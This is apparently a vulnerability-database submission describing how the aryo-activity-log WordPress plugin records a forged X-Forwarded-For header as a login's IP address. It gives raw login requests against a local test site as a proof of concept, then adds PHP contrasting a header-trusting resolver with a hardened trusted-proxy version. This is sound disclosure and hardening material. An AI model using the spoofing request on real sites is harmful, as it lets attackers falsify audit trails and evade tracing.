Title | Http Header Injection in aryo-activity-log |
---|
Description | HTTP header injection vulnerability in the aryo-activity-log WordPress plugin that allows the request IP to be manipulated by adding X-Forwarded-For
1. Install the aryo-activity-log WordPress plugin
https://wordpress.org/plugins/aryo-activity-log/
2. Create a login request like this
POST /wp-login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-login.php?loggedout=true&wp_lang=en_US
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Origin: http://localhost
Connection: close
Cookie: njt-fs-filemanager-settings-tab_last_tab=1; wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=d75f7938aa9b661bd79ac1844d216f59; wp_lang=en_US; ucp_tabs=2; _ga=GA1.1.1550157811.1667294040
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

log=admin&pwd=adminadmin&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1
3. Add X-Forwarded-For for IP spoofing in the activity log
POST /wp-login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-login.php?loggedout=true&wp_lang=en_US
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Origin: http://localhost
X-Forwarded-For: 1.1.1.1
Connection: close
Cookie: njt-fs-filemanager-settings-tab_last_tab=1; wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=d75f7938aa9b661bd79ac1844d216f59; wp_lang=en_US; ucp_tabs=2; _ga=GA1.1.1550157811.1667294040
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

log=admin&pwd=adminadmin&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1
4. Navigate to the activity log
PoC:
https://drive.google.com/file/d/1x-pgK3_-uS7NWfkEt_tk4Wc9FhXk-pYX/view?usp=sharing
https://drive.google.com/file/d/1YNOLomPC95rRvtk0topUhStVIa7Y8lcq/view?usp=sharing
|
---|
User | rezaduty (ID 10530) |
---|
Submission | 03/11/2022 11:46 (2 years ago) |
---|
Moderation | 11/11/2022 08:06 (8 days later) |
---|
Status | Accepted |
---|
VulDB Entry | 213448 |
---|
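The report above shows the symptom (a forged X-Forwarded-For value ends up as the "IP" of a login event) but not the code pattern behind it. The following is an added example written for this page, not code from the aryo-activity-log plugin: it models a client-IP resolver that trusts X-Forwarded-For from anyone, as the PoC demonstrates, next to a hardened resolver that only honours the header when the direct peer (REMOTE_ADDR) is a configured reverse proxy. All function names, the trusted-proxy list and the request arrays are hypothetical and constructed for illustration.

```php
<?php
// Added example for this page; not the plugin's own code.
// Function names, the proxy list and the $_SERVER-style arrays are hypothetical.

declare(strict_types=1);

/**
 * Vulnerable pattern: any client can send X-Forwarded-For, so the value that
 * ends up in the activity log is attacker-controlled when no proxy is in front
 * of PHP (or when the proxy appends rather than overwrites the header).
 */
function vulnerable_client_ip(array $server): string
{
    if (!empty($server['HTTP_X_FORWARDED_FOR'])) {
        // Takes the left-most hop verbatim: whatever the client typed in.
        $parts = explode(',', $server['HTTP_X_FORWARDED_FOR']);
        return trim($parts[0]);
    }
    return $server['REMOTE_ADDR'] ?? '';
}

/**
 * Hardened resolver. REMOTE_ADDR is the only address the web server itself
 * vouches for. X-Forwarded-For is consulted only when REMOTE_ADDR is a known
 * reverse proxy, and then the chain is walked from the right (the end our
 * proxy appended to), skipping trusted hops, so a client-supplied prefix can
 * never win. Every candidate is validated as an IP literal before use.
 */
function trusted_client_ip(array $server, array $trusted_proxies): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if ($remote === '' || !in_array($remote, $trusted_proxies, true)) {
        // Direct connection or unknown peer: forwarded headers are untrusted input.
        return $remote;
    }
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    for ($i = count($hops) - 1; $i >= 0; $i--) {
        $ip = $hops[$i];
        if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
            // Malformed entry: stop trusting anything further left in the chain.
            break;
        }
        if (!in_array($ip, $trusted_proxies, true)) {
            // First untrusted hop from the right is the real client.
            return $ip;
        }
    }
    // Chain consisted only of trusted proxies or was malformed: fall back to the peer.
    return $remote;
}

// Constructed requests mirroring the PoC: the same login POST arriving directly
// (no proxy in front of PHP), without and with a forged X-Forwarded-For.
$direct  = ['REMOTE_ADDR' => '192.0.2.10', 'REQUEST_URI' => '/wp-login.php'];
$spoofed = $direct + ['HTTP_X_FORWARDED_FOR' => '1.1.1.1'];

// Constructed request as it would arrive through a trusted reverse proxy at
// 10.0.0.5 (hypothetical), where the client tried to prepend a fake address
// and the proxy appended the real peer 198.51.100.7.
$via_proxy = [
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => '1.1.1.1, 198.51.100.7',
];
$trusted_proxies = ['10.0.0.5'];

printf("vulnerable, direct:  %s\n", vulnerable_client_ip($direct));
printf("vulnerable, spoofed: %s\n", vulnerable_client_ip($spoofed));
printf("hardened,   spoofed: %s\n", trusted_client_ip($spoofed, $trusted_proxies));
printf("hardened,   proxied: %s\n", trusted_client_ip($via_proxy, $trusted_proxies));
```

Run with `php example.php`. The vulnerable resolver reports the forged 1.1.1.1 for the spoofed direct request, which is exactly what the PoC shows in the activity log; the hardened resolver ignores the header for that request because 192.0.2.10 is not a configured proxy, and for the proxied request it returns the proxy-appended 198.51.100.7 rather than the client-supplied prefix. For anyone doing incident response on such a log, the practical caveat is the same: an IP column populated from X-Forwarded-For is only as trustworthy as the proxy that sets or overwrites that header, and with no proxy at all it is plain user input.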